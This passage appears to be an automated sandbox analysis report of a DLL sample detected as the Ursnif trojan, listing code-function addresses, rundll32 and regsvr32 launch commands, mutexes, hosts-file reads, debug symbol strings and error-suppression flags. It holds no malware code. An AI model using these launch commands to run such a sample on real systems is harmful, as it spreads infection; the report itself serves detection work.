          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC130F1E140_2_00007FFC130F1E14
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC130E4C800_2_00007FFC130E4C80
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC130E90B00_2_00007FFC130E90B0
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC130EDCAC0_2_00007FFC130EDCAC
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC130E5CC00_2_00007FFC130E5CC0
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC130FF8F00_2_00007FFC130FF8F0
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC130F98F00_2_00007FFC130F98F0
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC130E15200_2_00007FFC130E1520
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC130F8D500_2_00007FFC130F8D50
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC13100D700_2_00007FFC13100D70
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC130EF9640_2_00007FFC130EF964
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00739D6C3_2_00739D6C
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_007356383_2_00735638
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_007337E03_2_007337E0
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00733CD83_2_00733CD8
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_007331C03_2_007331C0
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_007345403_2_00734540
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0073204C3_2_0073204C
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0073A9183_2_0073A918
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00736DF03_2_00736DF0
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00737FD43_2_00737FD4
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_007334A43_2_007334A4
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFC130E58403_2_00007FFC130E5840
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFC130F75E03_2_00007FFC130F75E0
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFC130E6D503_2_00007FFC130E6D50
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFC130E9BA03_2_00007FFC130E9BA0
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFC130E83C03_2_00007FFC130E83C0
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFC130F68083_2_00007FFC130F6808
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFC130E68203_2_00007FFC130E6820
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFC130FF2903_2_00007FFC130FF290
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFC130E42A03_2_00007FFC130E42A0
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFC130E76E03_2_00007FFC130E76E0
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFC130E1B103_2_00007FFC130E1B10
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFC130FB3703_2_00007FFC130FB370
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFC130FB9B03_2_00007FFC130FB9B0
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFC130F1E143_2_00007FFC130F1E14
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFC130E4C803_2_00007FFC130E4C80
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFC130E90B03_2_00007FFC130E90B0
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFC130EDCAC3_2_00007FFC130EDCAC
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFC130E5CC03_2_00007FFC130E5CC0
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFC130FF8F03_2_00007FFC130FF8F0
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFC130F98F03_2_00007FFC130F98F0
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFC130E15203_2_00007FFC130E1520
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFC130F8D503_2_00007FFC130F8D50
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFC13100D703_2_00007FFC13100D70
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFC130EF9643_2_00007FFC130EF964
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000017B359E37E04_2_0000017B359E37E0
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000017B359E34A44_2_0000017B359E34A4
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000017B359E3CD84_2_0000017B359E3CD8
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000017B359E7FD44_2_0000017B359E7FD4
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000017B359E31C04_2_0000017B359E31C0
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000017B359E6DF04_2_0000017B359E6DF0
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000017B359EA9184_2_0000017B359EA918
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000017B359E56384_2_0000017B359E5638
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000017B359E204C4_2_0000017B359E204C
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000017B359E45404_2_0000017B359E4540
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000017B359E9D6C4_2_0000017B359E9D6C
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000201A29A37E05_2_00000201A29A37E0
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000201A29A9D6C5_2_00000201A29A9D6C
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000201A29A31C05_2_00000201A29A31C0
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000201A29A34A45_2_00000201A29A34A4
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000201A29A7FD45_2_00000201A29A7FD4
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000201A29A3CD85_2_00000201A29A3CD8
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000201A29A6DF05_2_00000201A29A6DF0
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000201A29AA9185_2_00000201A29AA918
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000201A29A45405_2_00000201A29A4540
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000201A29A56385_2_00000201A29A5638
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000201A29A204C5_2_00000201A29A204C
          Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFC130E9BA08_2_00007FFC130E9BA0
          Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFC130E83C08_2_00007FFC130E83C0
          Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFC130F68088_2_00007FFC130F6808
          Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFC130E68208_2_00007FFC130E6820
          Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFC130E58408_2_00007FFC130E5840
          Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFC130FF2908_2_00007FFC130FF290
          Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFC130E42A08_2_00007FFC130E42A0
          Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFC130E76E08_2_00007FFC130E76E0
          Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFC130E1B108_2_00007FFC130E1B10
          Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFC130FB3708_2_00007FFC130FB370
          Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFC130FB9B08_2_00007FFC130FB9B0
          Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFC130F75E08_2_00007FFC130F75E0
          Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFC130F1E148_2_00007FFC130F1E14
          Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFC130E4C808_2_00007FFC130E4C80
          Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFC130E90B08_2_00007FFC130E90B0
          Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFC130EDCAC8_2_00007FFC130EDCAC
          Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFC130E5CC08_2_00007FFC130E5CC0
          Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFC130FF8F08_2_00007FFC130FF8F0
          Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFC130F98F08_2_00007FFC130F98F0
          Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFC130E15208_2_00007FFC130E1520
          Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFC130E6D508_2_00007FFC130E6D50
          Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFC130F8D508_2_00007FFC130F8D50
          Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFC13100D708_2_00007FFC13100D70
          Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFC130EF9648_2_00007FFC130EF964
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000201640CA0AC CreateFileW,NtQueryDirectoryFile,0_2_00000201640CA0AC
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0073A0AC CreateFileW,NtQueryDirectoryFile,3_2_0073A0AC
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000017B359EA0AC CreateFileW,NtQueryDirectoryFile,4_2_0000017B359EA0AC
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000201A29AA0AC CreateFileW,NtQueryDirectoryFile,5_2_00000201A29AA0AC
          Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
          Source: pzG0rkIchr.dllVirustotal: Detection: 57%
          Source: pzG0rkIchr.dllReversingLabs: Detection: 73%
          Source: pzG0rkIchr.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\System32\loaddll64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\pzG0rkIchr.dll"
          Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\pzG0rkIchr.dll",#1
          Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\pzG0rkIchr.dll
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\pzG0rkIchr.dll",#1
          Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\pzG0rkIchr.dll,DllRegisterServer
          Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\pzG0rkIchr.dll,ItsnPq5v
          Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\pzG0rkIchr.dll,QlqYo259k
          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6044 -s 276
          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6136 -s 304
          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6136 -s 304
          Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\pzG0rkIchr.dll",#1Jump to behavior
          Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\pzG0rkIchr.dllJump to behavior
          Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\pzG0rkIchr.dll,DllRegisterServerJump to behavior
          Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\pzG0rkIchr.dll,ItsnPq5vJump to behavior
          Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\pzG0rkIchr.dll,QlqYo259kJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\pzG0rkIchr.dll",#1Jump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6136 -s 304Jump to behavior
          Source: C:\Windows\System32\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERDC43.tmpJump to behavior
          Source: classification engineClassification label: mal92.troj.evad.winDLL@19/8@4/2
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\pzG0rkIchr.dll",#1
          Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6044
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4696:120:WilError_01
          Source: C:\Windows\System32\regsvr32.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ManagerMui
          Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6136
          Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: pzG0rkIchr.dllStatic PE information: Image base 0x180000000 > 0x60000000
          Source: pzG0rkIchr.dllStatic PE information: certificate valid
          Source: pzG0rkIchr.dllStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
          Source: pzG0rkIchr.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: UxTheme.pdb source: WerFault.exe, 0000000D.00000003.375045922.000001EA8FE97000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000003.375091188.000001EA8FE97000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: gdi32.pdb source: WerFault.exe, 0000000D.00000003.375083510.000001EA8FE94000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000003.375037408.000001EA8FE91000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: kernelbase.pdb0 source: WerFault.exe, 0000000D.00000003.359316080.000001EA8F2F7000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000003.370137520.000001EA8F2F7000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: bcryptprimitives.pdb8 source: WerFault.exe, 0000000D.00000003.375037408.000001EA8FE91000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: oleaut32.pdb"V source: WerFault.exe, 0000000D.00000003.375045922.000001EA8FE97000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000003.375091188.000001EA8FE97000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: sechost.pdb source: WerFault.exe, 0000000D.00000003.375045922.000001EA8FE97000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000003.375091188.000001EA8FE97000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: rpcrt4.pdb source: WerFault.exe, 0000000D.00000003.375037408.000001EA8FE91000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000D.00000003.375037408.000001EA8FE91000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: kernelbase.pdb8 source: WerFault.exe, 0000000D.00000003.375037408.000001EA8FE91000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ucrtbase.pdb8 source: WerFault.exe, 0000000D.00000003.375037408.000001EA8FE91000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: shcore.pdb8 source: WerFault.exe, 0000000D.00000003.375037408.000001EA8FE91000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000D.00000003.375037408.000001EA8FE91000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: combase.pdb8 source: WerFault.exe, 0000000D.00000003.375037408.000001EA8FE91000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: elbase.pdb source: WerFault.exe, 0000000D.00000002.379074933.000001EA8D552000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000003.370270156.000001EA8D563000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: win32u.pdb8 source: WerFault.exe, 0000000D.00000003.375083510.000001EA8FE94000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000003.375037408.000001EA8FE91000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: shcore.pdb source: WerFault.exe, 0000000D.00000003.375037408.000001EA8FE91000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: msctf.pdb source: WerFault.exe, 0000000D.00000003.375045922.000001EA8FE97000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000003.375091188.000001EA8FE97000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: gdi32full.pdb8 source: WerFault.exe, 0000000D.00000003.375083510.000001EA8FE94000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000003.375037408.000001EA8FE91000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: gdi32.pdb8 source: WerFault.exe, 0000000D.00000003.375083510.000001EA8FE94000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000003.375037408.000001EA8FE91000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: user32.pdb source: WerFault.exe, 0000000D.00000003.375037408.000001EA8FE91000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000D.00000003.375077557.000001EA8FE90000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: rundll32.pdb8 source: WerFault.exe, 0000000D.00000003.375037408.000001EA8FE91000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: rpcrt4.pdb8 source: WerFault.exe, 0000000D.00000003.375037408.000001EA8FE91000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000D.00000003.375037408.000001EA8FE91000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: imagehlp.pdb8 source: WerFault.exe, 0000000D.00000003.375037408.000001EA8FE91000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ntdll.pdb source: WerFault.exe, 0000000D.00000003.370270156.000001EA8D563000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000003.373102112.000001EA8F2EA000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000003.359276516.000001EA8F2EA000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000003.375037408.000001EA8FE91000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: combase.pdb source: WerFault.exe, 0000000D.00000003.375037408.000001EA8FE91000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: kernel32.pdb source: WerFault.exe, 0000000D.00000003.371722395.000001EA8F2F1000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000003.370270156.000001EA8D563000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000003.359287144.000001EA8F2F1000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000003.375037408.000001EA8FE91000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: dwmapi.pdb6V source: WerFault.exe, 0000000D.00000003.375045922.000001EA8FE97000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000003.375091188.000001EA8FE97000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: rundll32.pdb source: WerFault.exe, 0000000D.00000003.359149665.000001EA8F2E4000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000003.370270156.000001EA8D563000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000003.375037408.000001EA8FE91000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000003.359079833.000001EA8F379000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: msvcrt.pdb8 source: WerFault.exe, 0000000D.00000003.375037408.000001EA8FE91000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000D.00000003.375045922.000001EA8FE97000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000003.375091188.000001EA8FE97000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: msctf.pdb!V source: WerFault.exe, 0000000D.00000003.375045922.000001EA8FE97000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000003.375091188.000001EA8FE97000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ntdll.pdb8 source: WerFault.exe, 0000000D.00000003.375037408.000001EA8FE91000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: imagehlp.pdb source: WerFault.exe, 0000000D.00000003.375037408.000001EA8FE91000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: win32u.pdb source: WerFault.exe, 0000000D.00000003.375083510.000001EA8FE94000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000003.375037408.000001EA8FE91000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: gdi32full.pdb source: WerFault.exe, 0000000D.00000003.375083510.000001EA8FE94000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000003.375037408.000001EA8FE91000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: kernel32.pdb8 source: WerFault.exe, 0000000D.00000003.375037408.000001EA8FE91000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: user32.pdb8 source: WerFault.exe, 0000000D.00000003.375037408.000001EA8FE91000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: dwmapi.pdb source: WerFault.exe, 0000000D.00000003.375045922.000001EA8FE97000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000003.375091188.000001EA8FE97000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ntdll.pdb0 source: WerFault.exe, 0000000D.00000003.373102112.000001EA8F2EA000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000003.359276516.000001EA8F2EA000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: kernelbase.pdb source: WerFault.exe, 0000000D.00000003.359316080.000001EA8F2F7000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000003.370137520.000001EA8F2F7000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000003.375037408.000001EA8FE91000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: kernel32.pdb0 source: WerFault.exe, 0000000D.00000003.371722395.000001EA8F2F1000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000003.359287144.000001EA8F2F1000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: imm32.pdb source: WerFault.exe, 0000000D.00000003.375077557.000001EA8FE90000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC130FB9B0 LoadLibraryA,GetProcAddress,0_2_00007FFC130FB9B0
          Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\pzG0rkIchr.dll

          Hooking and other Techniques for Hiding and Protection

          barindex
          Yara detected Ursnif
          Source: Yara matchFile source: Process Memory Space: loaddll64.exe PID: 1556, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2356, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5268, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5264, type: MEMORYSTR
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
